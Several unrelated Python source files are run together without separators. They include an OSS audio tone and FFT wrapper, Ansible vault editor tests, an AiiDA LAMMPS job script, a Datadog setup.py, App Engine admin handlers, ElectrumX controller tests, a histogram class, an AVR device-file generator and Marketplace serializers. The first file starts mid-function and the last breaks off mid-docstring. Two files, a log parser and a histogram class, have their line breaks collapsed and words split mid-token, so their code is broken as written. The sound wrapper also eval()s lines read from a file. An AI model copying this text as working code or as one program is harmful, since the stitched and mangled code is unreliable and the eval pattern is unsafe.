            sample[n] += int(127 * math.sin(n * 2 * math.pi * freq/sample_rate) * volume)
    return minmax(sample)

class SoundThread(threading.Thread):
    # Background writer: polls parent.buffer under parent.lock and streams
    # any pending sample to the audio device.
    def __init__(self, parent, name = "sound thread"):
        threading.Thread.__init__(self, name = name)
        self.parent = parent
        self.event = threading.Event()
        self.start()
    def run(self):
        while not self.event.isSet():
            # Take a snapshot of the pending buffer and clear it atomically.
            self.parent.lock.acquire()
            buffer = copy.copy(self.parent.buffer)
            self.parent.buffer = None
            self.parent.lock.release()
            if buffer != None:
                self.parent.dev.write("".join(map(chr,buffer)))
                self.parent.dev.flush()
            self.event.wait(.001)
    def join(self, timeout=None):
        # Signal the loop to stop before joining.
        self.event.set()
        threading.Thread.join(self, timeout)

class SoundDevice:
    # Thin wrapper over /dev/dsp: play tones/samples, read audio, and find
    # the dominant frequency via FFT. All methods no-op when ossaudiodev is
    # unavailable.
    def __init__(self, device, async = 0, cache = 1):
        self.device = device
        self.async = async          # nonzero: writes go through SoundThread
        self.cache = cache          # nonzero: memoize generated tones
        self.cacheDict = {}         # (freq, seconds) -> sample list
        self.status = "closed"      # "closed", "r" or "w"
        self.number_of_channels= 1
        self.sample_rate= 8000
        self.sample_width= 1
        self.minFreq = 20           # Hz bounds used by getFreq()
        self.maxFreq = 3500
        self.debug = 0
        self.buffer = None          # pending sample for the async thread
        if ossaudiodev != None:
            self.format = ossaudiodev.AFMT_U8
        if self.debug:
            self.setFile("770.txt")
        if self.async:
            self.lock = threading.Lock()
            self.thread = SoundThread(self)
    def initialize(self, mode):
        # (Re)open the dsp device in "r" or "w" mode.
        if ossaudiodev == None: return
        self.dev = ossaudiodev.open("/dev/dsp", mode)
        self.dev.setparameters(self.format, self.number_of_channels, self.sample_rate)
        self.status = mode
    def play(self, sample):
        """Play a raw 8-bit sample (list of ints 0..255), async if enabled."""
        if ossaudiodev == None: return
        if self.status != "w":
            self.initialize("w")
        if self.async:
            self.lock.acquire()
            self.buffer = sample
            self.lock.release()
        else:
            self.dev.write("".join(map(chr,sample)))
            self.dev.flush()
    def playTone(self, freqs, seconds, volume = 1.0):
        """
        freq example:
        playTone([550,400], .1, volume=.5) # middle C for .1 seconds, half volume
        """
        if ossaudiodev == None: return
        if type(freqs) == type(0):
            freqs = [freqs]
        if self.status != "w":
            self.initialize("w")
        sample = [128] * int(self.sample_rate * seconds)
        for freq in freqs:
            # NOTE(review): the cache hit replaces (rather than mixes into)
            # the accumulated sample — multi-frequency tones with a cached
            # component lose the other components.
            if self.cache and (freq,seconds) in self.cacheDict:
                sample = self.cacheDict[(freq,seconds)]
            else:
                for n in range(len(sample)):
                    sample[n] = min(max(sample[n] + int(127 * math.sin(n * 2 * math.pi * freq/self.sample_rate) * volume), 0),255)
                self.cacheDict[(freq,seconds)] = sample
        if self.async:
            self.lock.acquire()
            self.buffer = sample
            self.lock.release()
        else:
            self.dev.write("".join(map(chr,sample)))
            self.dev.flush()
    def read(self, seconds):
        # Blocking read; returns a tuple of unsigned bytes.
        if ossaudiodev == None: return
        if self.status != "r":
            self.initialize("r")
        buffer = self.dev.read(int(self.sample_rate * seconds))
        size = len(buffer)
        return struct.unpack(str(size) + "B", buffer)
    def setFile(self, filename):
        # Point debug playback at a text file of eval()-able sample lines.
        if ossaudiodev == None: return
        self.filename = filename
        self.fp = open(self.filename, "r")
    def readFile(self, seconds):
        # Debug stand-in for read(): pull one line of sample data from the
        # file, rewinding to the start when the file is exhausted.
        if ossaudiodev == None: return
        data = None
        try:
            data = eval(self.fp.readline())
        except:
            self.fp = open(self.filename, "r")
            try:
                data = eval(self.fp.readline())
            except:
                print "Failed reading file '%s'" % self.filename
        time.sleep(seconds)
        return data[:int(seconds * self.sample_rate)]
    def getFreq(self, seconds):
        # change to read from the buffer, rather than block
        # Return (dominant frequency, its FFT magnitude, DC term/volume).
        if ossaudiodev == None: return
        if self.debug:
            data = self.readFile(1)
        else:
            data = self.read(seconds)
        transform = FFT.real_fft(data).real
        # Search only bins inside the configured frequency window.
        minFreqPos = self.minFreq
        maxFreqPos = self.maxFreq
        freq = Numeric.argmax(transform[1+minFreqPos:maxFreqPos])
        value = transform[1+minFreqPos:maxFreqPos][freq]
        domFreq = (freq + self.minFreq) / seconds
        if self.debug and abs(value) > 8000 and self.minFreq < domFreq < self.maxFreq:
            print "Frequence:", domFreq, "Value:", value, "Volume:", transform[0]
        return (domFreq, value, transform[0])
    def close(self):
        if ossaudiodev == None: return
        if self.status != "closed":
            self.dev.close()
            self.status = "closed"

if __name__ == "__main__":
    sd = SoundDevice("/dev/dsp", async = 1)
    sd.playTone(500, 1)

## DTMF Tones
##         1209 Hz 1336 Hz 1477 Hz 1633 Hz
##                   ABC     DEF
##  697 Hz   1       2       3       A
##          GHI     JKL     MNO
##  770 Hz   4       5       6       B
##          PRS     TUV     WXY
##  852 Hz   7       8       9       C
##                  oper
##  941 Hz   *       0       #       D
# (c) 2014, James Tanner <tanner.jc@gmail.com>
# (c) 2014, James Cammarata, <jcammarata@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible.  If not, see <http://www.gnu.org/licenses/>.

# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type

import sys
import os
import tempfile

from nose.plugins.skip import SkipTest

from ansible.compat.tests import unittest
from ansible.compat.tests.mock import patch
from ansible import errors
from ansible.parsing.vault import VaultLib
from ansible.parsing.vault import VaultEditor

from ansible.module_utils._text import to_bytes, to_text

# Counter import fails for 2.0.1, requires >= 2.6.1 from pip
try:
    from Crypto.Util import Counter
    HAS_COUNTER = True
except ImportError:
    HAS_COUNTER = False

# KDF import fails for 2.0.1, requires >= 2.6.1 from pip
try:
    from Crypto.Protocol.KDF import PBKDF2
    HAS_PBKDF2 = True
except ImportError:
    HAS_PBKDF2 = False

# AES IMPORTS
try:
    from Crypto.Cipher import AES as AES
    HAS_AES = True
except ImportError:
    HAS_AES = False

# Vault fixture: "foo" encrypted with password "ansible", format 1.0 (AES).
v10_data = """$ANSIBLE_VAULT;1.0;AES
53616c7465645f5fd0026926a2d415a28a2622116273fbc90e377225c12a347e1daf4456d36a77f9
9ad98d59f61d06a4b66718d855f16fb7bdfe54d1ec8aeaa4d06c2dc1fa630ae1846a029877f0eeb1
83c62ffb04c2512995e815de4b4d29ed"""

# Vault fixture: "foo" encrypted with password "ansible", format 1.1 (AES256).
v11_data = """$ANSIBLE_VAULT;1.1;AES256
62303130653266653331306264616235333735323636616539316433666463323964623162386137
3961616263373033353631316333623566303532663065310a393036623466376263393961326530
64336561613965383835646464623865663966323464653236343638373165343863623638316664
3631633031323837340a396530313963373030343933616133393566366137363761373930663833
3739"""


class TestVaultEditor(unittest.TestCase):

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_methods_exist(self):
        # Smoke-check the VaultEditor public surface.
        v = VaultEditor(None)
        slots = ['create_file',
                 'decrypt_file',
                 'edit_file',
                 'encrypt_file',
                 'rekey_file',
                 'read_data',
                 'write_data',
                 'shuffle_files']
        for slot in slots:
            # NOTE(review): message says "VaultLib" but the object under test
            # is a VaultEditor.
            assert hasattr(v, slot), "VaultLib is missing the %s method" % slot

    @patch.object(VaultEditor, '_editor_shell_command')
    def test_create_file(self, mock_editor_shell_command):
        # Replace the interactive $EDITOR with 'touch' so create_file just
        # creates an empty file.
        def sc_side_effect(filename):
            return ['touch', filename]
        mock_editor_shell_command.side_effect = sc_side_effect

        # Reserve a unique path, then remove it so create_file can create it.
        tmp_file = tempfile.NamedTemporaryFile()
        os.unlink(tmp_file.name)

        ve = VaultEditor("ansible")
        ve.create_file(tmp_file.name)

        self.assertTrue(os.path.exists(tmp_file.name))

    def test_decrypt_1_0(self):
        # Skip testing decrypting 1.0 files if we don't have access to AES, KDF or Counter.
        if not HAS_AES or not HAS_COUNTER or not HAS_PBKDF2:
            raise SkipTest

        v10_file = tempfile.NamedTemporaryFile(delete=False)
        with v10_file as f:
            f.write(to_bytes(v10_data))

        ve = VaultEditor("ansible")

        # make sure the password functions for the cipher
        error_hit = False
        try:
            ve.decrypt_file(v10_file.name)
        except errors.AnsibleError:
            error_hit = True

        # verify decrypted content
        f = open(v10_file.name, "rb")
        fdata = to_text(f.read())
        f.close()

        os.unlink(v10_file.name)

        assert error_hit is False, "error decrypting 1.0 file"
        assert fdata.strip() == "foo", "incorrect decryption of 1.0 file: %s" % fdata.strip()

    def test_decrypt_1_1(self):
        # Same as test_decrypt_1_0 but for the 1.1 (AES256) format.
        if not HAS_AES or not HAS_COUNTER or not HAS_PBKDF2:
            raise SkipTest

        v11_file = tempfile.NamedTemporaryFile(delete=False)
        with v11_file as f:
            f.write(to_bytes(v11_data))

        ve = VaultEditor("ansible")

        # make sure the password functions for the cipher
        error_hit = False
        try:
            ve.decrypt_file(v11_file.name)
        except errors.AnsibleError:
            error_hit = True

        # verify decrypted content
        f = open(v11_file.name, "rb")
        fdata = to_text(f.read())
        f.close()

        os.unlink(v11_file.name)

        assert error_hit is False, "error decrypting 1.0 file"
        assert fdata.strip() == "foo", "incorrect decryption of 1.0 file: %s" % fdata.strip()

    def test_rekey_migration(self):
        # Rekeying a 1.0 vault with a new password must upgrade it to
        # 1.1/AES256 and keep the plaintext intact.
        # Skip testing rekeying files if we don't have access to AES, KDF or Counter.
        if not HAS_AES or not HAS_COUNTER or not HAS_PBKDF2:
            raise SkipTest

        v10_file = tempfile.NamedTemporaryFile(delete=False)
        with v10_file as f:
            f.write(to_bytes(v10_data))

        ve = VaultEditor("ansible")

        # make sure the password functions for the cipher
        error_hit = False
        try:
            ve.rekey_file(v10_file.name, 'ansible2')
        except errors.AnsibleError:
            error_hit = True

        # verify decrypted content
        f = open(v10_file.name, "rb")
        fdata = f.read()
        f.close()

        assert error_hit is False, "error rekeying 1.0 file to 1.1"

        # ensure filedata can be decrypted, is 1.1 and is AES256
        vl = VaultLib("ansible2")
        dec_data = None
        error_hit = False
        try:
            dec_data = vl.decrypt(fdata)
        except errors.AnsibleError:
            error_hit = True

        os.unlink(v10_file.name)

        assert vl.cipher_name == "AES256", "wrong cipher name set after rekey: %s" % vl.cipher_name
        assert error_hit is False, "error decrypting migrated 1.0 file"
        assert dec_data.strip() == b"foo", "incorrect decryption of rekeyed/migrated file: %s" % dec_data
# NOTE(review): Python 2 script (raw_input, print statements).
def main():
    # Read one line from stdin and echo it with leading whitespace removed.
    a=raw_input()
    print a.lstrip()
    print "Hello world"

main()
from __future__ import absolute_import

from jinja2 import Markup
from rstblog.programs import RSTProgram
import typogrify


class TypogrifyRSTProgram(RSTProgram):
    """RST program that post-processes the rendered fragment with typogrify."""

    def get_fragments(self):
        """Render the source file once, typogrify the fragment, and cache it."""
        cached = self._fragment_cache
        if cached is None:
            with self.context.open_source_file() as source:
                self.get_header(source)
                cached = self.context.render_rst(source.read().decode('utf-8'))
            # Apply typographic fixes and mark the result as safe markup.
            cached['fragment'] = Markup(typogrify.typogrify(cached['fragment']))
            self._fragment_cache = cached
        return cached


def setup(builder):
    """Register the typogrify-aware RST program for '.rst' sources."""
    builder.programs['rst'] = TypogrifyRSTProgram
# NOTE(review): Python 2 script (print statements). Submits a LAMMPS MD
# calculation for bulk silicon through AiiDA; running it stores nodes in the
# AiiDA database and (unless test_only) submits the job.
from aiida import load_dbenv
load_dbenv()

from aiida.orm import Code, DataFactory
import numpy as np

StructureData = DataFactory('structure')
ParameterData = DataFactory('parameter')

codename = 'lammps_md@boston'

############################
#  Define input parameters #
############################

# Conventional 8-atom diamond-cubic silicon cell, a = 5.404 Angstrom.
a = 5.404
cell = [[a, 0, 0],
        [0, a, 0],
        [0, 0, a]]

symbols=['Si'] * 8
scaled_positions = [(0.875,  0.875,  0.875),
                    (0.875,  0.375,  0.375),
                    (0.375,  0.875,  0.375),
                    (0.375,  0.375,  0.875),
                    (0.125,  0.125,  0.125),
                    (0.125,  0.625,  0.625),
                    (0.625,  0.125,  0.625),
                    (0.625,  0.625,  0.125)]

structure = StructureData(cell=cell)
# NOTE(review): 'positions' is computed but never used; the loop below
# recomputes the cartesian position per atom.
positions = np.dot(scaled_positions, cell)

for i, scaled_position in enumerate(scaled_positions):
    structure.append_atom(position=np.dot(scaled_position, cell).tolist(),
                          symbols=symbols[i])

structure.store()

# Silicon(C) Tersoff
tersoff_si = {'Si Si Si ': '3.0 1.0 1.7322 1.0039e5 16.218 -0.59826 0.78734 1.0999e-6 1.7322 471.18 2.85 0.15 2.4799 1830.8'}

potential ={'pair_style': 'tersoff',
            'data': tersoff_si}

# Scheduler resources for the LAMMPS job.
lammps_machine = {'num_machines': 1,
                  'parallel_env': 'mpi*',
                  'tot_num_mpiprocs': 16}

# MD protocol: timestep in ps, thermostat at 300 K, 100 equilibration +
# 2000 production steps, dump every step.
parameters_md = {'timestep': 0.001,
                 'temperature': 300,
                 'thermostat_variable': 0.5,
                 'equilibrium_steps': 100,
                 'total_steps': 2000,
                 'dump_rate': 1}

code = Code.get_from_string(codename)

calc = code.new_calc(max_wallclock_seconds=3600,
                     resources=lammps_machine)

calc.label = "test lammps calculation"
calc.description = "A much longer description"
calc.use_code(code)

calc.use_structure(structure)
calc.use_potential(ParameterData(dict=potential))
calc.use_parameters(ParameterData(dict=parameters_md))

# Flip to True to only generate the submit script without submitting.
test_only = False

if test_only:  # It will not be submitted
    import os
    subfolder, script_filename = calc.submit_test()
    print "Test_submit for calculation (uuid='{}')".format(calc.uuid)
    print "Submit file in {}".format(os.path.join(
        os.path.relpath(subfolder.abspath),
        script_filename))
else:
    calc.store_all()
    print "created calculation; calc=Calculation(uuid='{}') # ID={}".format(
        calc.uuid, calc.dbnode.pk)
    calc.submit()
    print "submitted calculation; calc=Calculation(uuid='{}') # ID={}".format(
        calc.uuid, calc.dbnode.pk)
from codecs import open  # To use a consistent encoding
from os import path

from setuptools import setup

HERE = path.dirname(path.abspath(__file__))

# Load version metadata from the package's __about__ module.
ABOUT = {}
with open(path.join(HERE, 'datadog_checks', 'riak_repl', '__about__.py')) as f:
    exec(f.read(), ABOUT)

# The README doubles as the PyPI long description.
with open(path.join(HERE, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()


def get_dependencies():
    """Return the raw lines of requirements.in, or [] when the file is absent."""
    req_path = path.join(HERE, 'requirements.in')
    if not path.isfile(req_path):
        return []
    with open(req_path, encoding='utf-8') as req_file:
        return req_file.readlines()


def parse_pyproject_array(name):
    """Extract the top-level TOML array assigned to *name* in pyproject.toml."""
    import os
    import re
    from ast import literal_eval

    toml_path = os.path.join(HERE, 'pyproject.toml')
    with open(toml_path, 'r', encoding='utf-8') as toml_file:
        # Strip trailing whitespace per line: Windows \r\n would break the
        # $-anchored match below.
        contents = '\n'.join(line.rstrip() for line in toml_file)
    matcher = re.compile(r'^{} = (\[.*?\])$'.format(name), flags=re.MULTILINE | re.DOTALL)
    return literal_eval(matcher.search(contents).group(1))


# First entry of the declared dependencies is the datadog checks base package.
CHECKS_BASE_REQ = parse_pyproject_array('dependencies')[0]


setup(
    name='datadog-riak_repl',
    version=ABOUT['__version__'],
    description='The Riak_repl check',
    long_description=long_description,
    long_description_content_type='text/markdown',
    keywords='datadog agent riak_repl check',
    # The project's main homepage.
    url='https://github.com/DataDog/integrations-extras',
    # Author details
    author='Britt Treece',
    author_email='britt.treece@gmail.com',
    # License
    license='BSD-3-Clause',
    # See https://pypi.org/classifiers
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Intended Audience :: Developers',
        'Intended Audience :: System Administrators',
        'Topic :: System :: Monitoring',
        'License :: OSI Approved :: BSD License',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
    ],
    # The package we're going to ship
    packages=['datadog_checks', 'datadog_checks.riak_repl'],
    # Run-time dependencies
    install_requires=[CHECKS_BASE_REQ],
    extras_require={'deps': parse_pyproject_array('deps')},
    # Extra files to ship with the wheel package
    include_package_data=True,
)
import os,sys,re # EXTRACTING ALL FILENAMES AND THEIR CLIENTS # --------------------------------------------------- # read in the log # --------------------------------------------------- f=open(sys.argv[1],'rb') data=f.readlines() f.close() n=0 t=len(data) clients = [] filename = None for l in data : n = n + 1 parts = l.split()
# new file to ingest if parts[6] == 'Read' : # all products will have its first cli
ent as "allproducts" if filename != None : if len(clients) == 0 : clients.append('allproducts') else : clients.sort() clients.insert(0,'allproducts') print("%s %s" % (filename,','.join(clients)) ) filepath = parts[-1] filename = filepath.split('/')[-1] fparts = filename.split(':') # :20070409000009 trailing get rid of it if fparts[-1][:2] == '20' and len(fparts[-1]) == 14 : fparts = fparts[:-1] # '::' trailing get rid of it if fparts[-1] == '' : fparts = fparts[:-1] filename = ':'.join(fparts) clients = [] if parts[6] == 'Written' : filepath = parts[-1] client = 'conversion_' +filepath.split('/')[1] if client == 'conversion_ppmtogif' : client = 'cvt_togif' if client == 'conversion_rawtodfx' : continue clients.append(client) if parts[6] == 'create_link:' : filepath = parts[-1] client = filepath.split('/')[4] clients.append(client) if len(clients) == 0 : clients.append('allproducts') else : clients.sort() clients.insert(0,'allproducts') print("%s %s" % (filename,','.join(clients)) )
# -*- coding: utf-8 -*-
"""Admin request handlers (Google App Engine / webapp2 boilerplate).

Provides logout, a per-country user chart, and paginated user list/edit
views over the boilerplate ``User`` model.  Python 2 only (uses ``long``).
"""
import webapp2

from boilerplate import models
from boilerplate import forms
from boilerplate.handlers import BaseHandler
from google.appengine.datastore.datastore_query import Cursor
from google.appengine.ext import ndb
from google.appengine.api import users as googleusers
from collections import OrderedDict, Counter
from wtforms import fields


class Logout(BaseHandler):
    """Log the Google user out, then send them back to the home page."""

    def get(self):
        self.redirect(googleusers.create_logout_url(dest_url=self.uri_for('home')))


class Geochart(BaseHandler):
    """Render a count of users per country for the admin geochart page."""

    def get(self):
        # Projection query: only the 'country' property is fetched.
        users = models.User.query().fetch(projection=['country'])
        users_by_country = Counter()
        for user in users:
            if user.country:  # skip users with no country set
                users_by_country[user.country] += 1
        params = {
            "data": users_by_country.items()
        }
        return self.render_template('admin/geochart.html', **params)


class EditProfileForm(forms.EditProfileForm):
    """Profile form extended with an admin-only 'Activated' toggle."""
    activated = fields.BooleanField('Activated')


class List(BaseHandler):
    """Paginated, optionally filtered user list.

    Query-string parameters:
        q -- exact-match filter on last_name, email or username
        c -- urlsafe datastore cursor of the current page
        p -- 'prev' to page backwards; anything else pages forwards
    """

    def get(self):
        p = self.request.get('p')
        q = self.request.get('q')
        c = self.request.get('c')
        forward = True if p not in ['prev'] else False
        cursor = Cursor(urlsafe=c)

        if q:
            # OR-filter across the three exact-match fields.
            qry = models.User.query(ndb.OR(models.User.last_name == q,
                                           models.User.email == q,
                                           models.User.username == q))
        else:
            qry = models.User.query()

        PAGE_SIZE = 5
        if forward:
            users, next_cursor, more = qry.order(models.User.key).fetch_page(
                PAGE_SIZE, start_cursor=cursor)
            if next_cursor and more:
                self.view.next_cursor = next_cursor
            if c:
                # Reversed cursor lets the template link back to this page.
                self.view.prev_cursor = cursor.reversed()
        else:
            # Backwards paging: reverse the sort order, then reverse the
            # fetched page so it renders in forward order.
            users, next_cursor, more = qry.order(-models.User.key).fetch_page(
                PAGE_SIZE, start_cursor=cursor)
            users = list(reversed(users))
            if next_cursor and more:
                self.view.prev_cursor = next_cursor
            self.view.next_cursor = cursor.reversed()

        def pager_url(p, cursor):
            """Build a user-list URL carrying the filter/cursor state."""
            params = OrderedDict()
            if q:
                params['q'] = q
            if p in ['prev']:
                params['p'] = p
            if cursor:
                params['c'] = cursor.urlsafe()
            return self.uri_for('user-list', **params)

        self.view.pager_url = pager_url
        self.view.q = q

        params = {
            "list_columns": [('username', 'Username'),
                             ('last_name', 'Last Name'),
                             ('email', 'E-Mail'),
                             ('country', 'Country')],
            "users": users,
            "count": qry.count()
        }
        # FIXME: admin_user should probably go into BaseHandler
        params['admin_user'] = googleusers.is_current_user_admin()
        return self.render_template('admin/users.html', **params)


class Edit(BaseHandler):
    """Edit a single user (GET prefills the form, POST saves it)."""

    def get_or_404(self, user_id):
        """Return the User for *user_id* or abort with 404.

        ValueError from long() on a non-numeric id is treated as not-found.
        Python 2 only: uses the `long` builtin.
        """
        try:
            user = models.User.get_by_id(long(user_id))
            if user:
                return user
        except ValueError:
            pass
        self.abort(404)

    def edit(self, user_id):
        if self.request.POST:
            user = self.get_or_404(user_id)
            if self.form.validate():
                self.form.populate_obj(user)
                user.put()
                self.add_message("Changes saved!", 'success')
                return self.redirect_to("user-edit", user_id=user_id)
            else:
                # fall through and re-render the page with form errors
                self.add_message("Could not save changes!", 'error')
        else:
            user = self.get_or_404(user_id)
            self.form.process(obj=user)

        params = {
            'user': user
        }
        return self.render_template('admin/edituser.html', **params)

    @webapp2.cached_property
    def form(self):
        # Cached so validate() and the template see the same form instance.
        return EditProfileForm(self)
"""Tests for Controller.transaction_get.

Env and the daemon round-trip are fully mocked; only argument validation
and the daemon_request plumbing are exercised.
"""
import asyncio
from unittest import mock

from aiorpcx import RPCError

from server.env import Env
from server.controller import Controller

# One event loop shared by every test in this module.
loop = asyncio.get_event_loop()


def set_env():
    """Build an autospec'd Env carrying the minimal attributes Controller reads."""
    env = mock.create_autospec(Env)
    env.coin = mock.Mock()
    env.loop_policy = None
    env.max_sessions = 0
    env.max_subs = 0
    env.max_send = 0
    env.bandwidth_limit = 0
    env.identities = ''
    env.tor_proxy_host = env.tor_proxy_port = None
    env.peer_discovery = env.PD_SELF = False
    env.daemon_url = 'http://localhost:8000/'
    return env


async def coro(res):
    """Wrap a plain value in an awaitable (stub for daemon responses)."""
    return res


def raise_exception(msg):
    """Raise RPCError(1, msg).

    Used as coro(raise_exception(...)) so the error fires while the
    daemon_request stub is being awaited inside the test coroutine.
    """
    raise RPCError(1, msg)


def ensure_text_exception(test, exception):
    """Run coroutine *test* to completion and assert it raises *exception*."""
    res = err = None
    try:
        res = loop.run_until_complete(test)
    except Exception as e:
        err = e
    # (res, err) in the assert message shows what happened instead.
    assert isinstance(err, exception), (res, err)


def test_transaction_get():
    """Drive every transaction_get scenario on the shared loop."""

    async def test_verbose_ignore_by_backend():
        # verbose=True, but the daemon answers with a raw hex string:
        # the response is passed through unchanged.
        env = set_env()
        sut = Controller(env)
        sut.daemon_request = mock.Mock()
        sut.daemon_request.return_value = coro('11'*32)
        res = await sut.transaction_get('ff'*32, True)
        assert res == '11'*32

    async def test_verbose_ok():
        # verbose dict responses are returned as-is, with or without a
        # blockhash (None models an unconfirmed transaction).
        env = set_env()
        sut = Controller(env)
        sut.daemon_request = mock.Mock()
        response = {
            "hex": "00"*32,
            "blockhash": "ff"*32
        }
        sut.daemon_request.return_value = coro(response)
        res = await sut.transaction_get('ff'*32, True)
        assert res == response
        response = {
            "hex": "00"*32,
            "blockhash": None
        }
        sut.daemon_request.return_value = coro(response)
        res = await sut.transaction_get('ff'*32, True)
        assert res == response

    async def test_no_verbose():
        # Default (non-verbose) call returns the raw hex string.
        env = set_env()
        sut = Controller(env)
        sut.daemon_request = mock.Mock()
        response = 'cafebabe'*64
        sut.daemon_request.return_value = coro(response)
        res = await sut.transaction_get('ff'*32)
        assert res == response

    async def test_verbose_failure():
        # Backend error while awaiting the daemon must surface as RPCError.
        env = set_env()
        sut = Controller(env)
        sut.daemon_request = mock.Mock()
        sut.daemon_request.return_value = coro(
            raise_exception('some unhandled error'))
        await sut.transaction_get('ff' * 32, True)

    async def test_wrong_txhash():
        # Invalid hash must be rejected before any daemon call is made.
        env = set_env()
        sut = Controller(env)
        sut.daemon_request = mock.Mock()
        await sut.transaction_get('cafe')
        sut.daemon_request.assert_not_called()

    # Success-path coroutines run concurrently; error paths are checked
    # one by one for the expected RPCError.
    loop.run_until_complete(asyncio.gather(
        *[
            test_verbose_ignore_by_backend(),
            test_verbose_ok(),
            test_no_verbose()
        ]
    ))
    for error_test in [test_verbose_failure, test_wrong_txhash]:
        ensure_text_exception(error_test(), RPCError)
""" ================================================================================ Logscaled Histogram ================================================================================ | Calculates a logarithmically spaced histogram for a data map. | Written By: Matthew Stadelman | Date Written: 2016/03/07 | Last Modifed: 2016/10/20 """ import scipy as sp from .histogram import Histogram class HistogramLogscale(Histogram): r""" Performs a histogram where the bin limits are logarithmically spaced based on the supplied scale factor. If there are negative values then the first bin contains everything below 0, the next bin will contain everything between 0 and 1. kwargs include: scale_fact - numeric value to generate axis scale for bins. A scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc. """ def __init__(self, field, **kwargs): super().__init__(field) self.args.update(kwargs) self.output_key = 'hist_logscale' self.action = 'histogram_logscale' @classmethod def _add_subparser(cls, subparsers, parent): r""" Adds a specific action based sub-parser to the supplied arg_parser in
stance. """ parser = subparsers.add_parser(cls.__name__, aliases=['histlog'], parents=[parent], help=cls.__doc__) # parser.add_argument('scale_fact', type=float, nargs='?',
default=10.0, help='base to generate logscale from') parser.set_defaults(func=cls) def define_bins(self, **kwargs): r""" This defines the bins for a logscaled histogram """ self.data_vector.sort() sf = self.args['scale_fact'] num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1) # # generating initial bins from 1 - sf**num_bins low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1] high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:] # # Adding "catch all" bins for anything between 0 - 1 and less than 0 if self.data_vector[0] < 1.0: low.insert(0, 0.0) high.insert(0, 1.0) if self.data_vector[0] < 0.0: low.insert(0, self.data_vector[0]) high.insert(0, 0.0) # self.bins = [bin_ for bin_ in zip(low, high)]
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# Copyright (c) 2013, Roboterclub Aachen e.V.
# All rights reserved.
#
# The file is part of the xpcc library and is released under the 3-clause BSD
# license. See the file `LICENSE` for the full license governing this code.
# -----------------------------------------------------------------------------
"""Generate merged AVR device files for xpcc.

Reads the Atmel XML device descriptions matching each device-name prefix
given on the command line, merges them per AVR platform, and writes the
result into the xpcc source tree.  Log-level names ('error', 'warn', ...)
given as arguments adjust verbosity instead of selecting devices.
"""

import os
import sys
import glob

# add python module logger to path
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'logger'))
sys.path.append(os.path.join(os.path.dirname(__file__), '..', 'device_files'))
from logger import Logger

from dfg.device import Device
from dfg.merger import DeviceMerger
from dfg.avr.avr_reader import AVRDeviceReader
from dfg.avr.avr_writer import AVRDeviceWriter

if __name__ == "__main__":
    """
    Some test code
    """
    level = 'info'
    logger = Logger(level)
    devices = []

    for arg in sys.argv[1:]:
        # Log-level arguments only switch verbosity.
        if arg in ['error', 'warn', 'info', 'debug', 'disabled']:
            level = arg
            logger.setLogLevel(level)
            continue
        # Everything else is a device-name prefix to glob for.
        xml_path = os.path.join(os.path.dirname(__file__), '..', '..', '..',
                                'AVR_devices', (arg + '*'))
        files = glob.glob(xml_path)
        # renamed loop variable from `file`: don't shadow the builtin
        for xml_file in files:
            # deal with this here, rather than rewrite half the name merging
            if os.path.basename(xml_file) != "ATtiny28.xml":
                part = AVRDeviceReader(xml_file, logger)
                device = Device(part, logger)
                devices.append(device)

    merger = DeviceMerger(devices, logger)
    merger.mergedByPlatform('avr')

    folder = os.path.join(os.path.dirname(__file__), '..', '..', 'src',
                          'xpcc', 'architecture', 'platform', 'devices', 'avr')

    for dev in merger.mergedDevices:
        writer = AVRDeviceWriter(dev, logger)
        writer.write(folder)
"""Serializers for the Marketplace feed (FeedApp / FeedItem)."""
from rest_framework import relations, serializers

import amo
import mkt.carriers
import mkt.regions
from addons.models import Category
from mkt.api.fields import SplitField, TranslationSerializerField
from mkt.api.serializers import URLSerializerMixin
from mkt.collections.serializers import (CollectionSerializer, SlugChoiceField,
                                         SlugModelChoiceField)
from mkt.submit.serializers import PreviewSerializer
from mkt.webapps.api import AppSerializer

from .models import FeedApp, FeedItem


class FeedAppSerializer(URLSerializerMixin, serializers.ModelSerializer):
    """Serializer for a single featured-app entry in the feed.

    SplitField accepts a primary key on write and renders the full nested
    serializer on read.
    """
    app = SplitField(relations.PrimaryKeyRelatedField(required=True),
                     AppSerializer())
    description = TranslationSerializerField(required=False)
    preview = SplitField(relations.PrimaryKeyRelatedField(required=False),
                         PreviewSerializer())
    pullquote_attribution = TranslationSerializerField(required=False)
    pullquote_rating = serializers.IntegerField(required=False)
    pullquote_text = TranslationSerializerField(required=False)

    class Meta:
        fields = ('app', 'description', 'id', 'preview',
                  'pullquote_attribution', 'pullquote_rating',
                  'pullquote_text', 'url')
        model = FeedApp
        url_basename = 'feedapp'


class FeedItemSerializer(URLSerializerMixin, serializers.ModelSerializer):
    """Serializer for one feed item, optionally scoped by carrier/region.

    Exactly one of the object fields named in Meta.item_types must be set
    (enforced by validate()).
    """
    carrier = SlugChoiceField(required=False,
                              choices_dict=mkt.carriers.CARRIER_MAP)
    region = SlugChoiceField(required=False,
                             choices_dict=mkt.regions.REGION_LOOKUP)
    category = SlugModelChoiceField(
        required=False,
        queryset=Category.objects.filter(type=amo.ADDON_WEBAPP))
    item_type = serializers.SerializerMethodField('get_item_type')

    # Types of objects that are allowed to be a feed item.
    collection = SplitField(relations.PrimaryKeyRelatedField(required=False),
                            CollectionSerializer())

    class Meta:
        fields = ('carrier', 'category', 'collection', 'id', 'item_type',
                  'region', 'url')
        item_types = ('collection',)
        model = FeedItem
        url_basename = 'feeditem'

    def validate(self, attrs):
        """
        Ensure that at least one object type is specified.
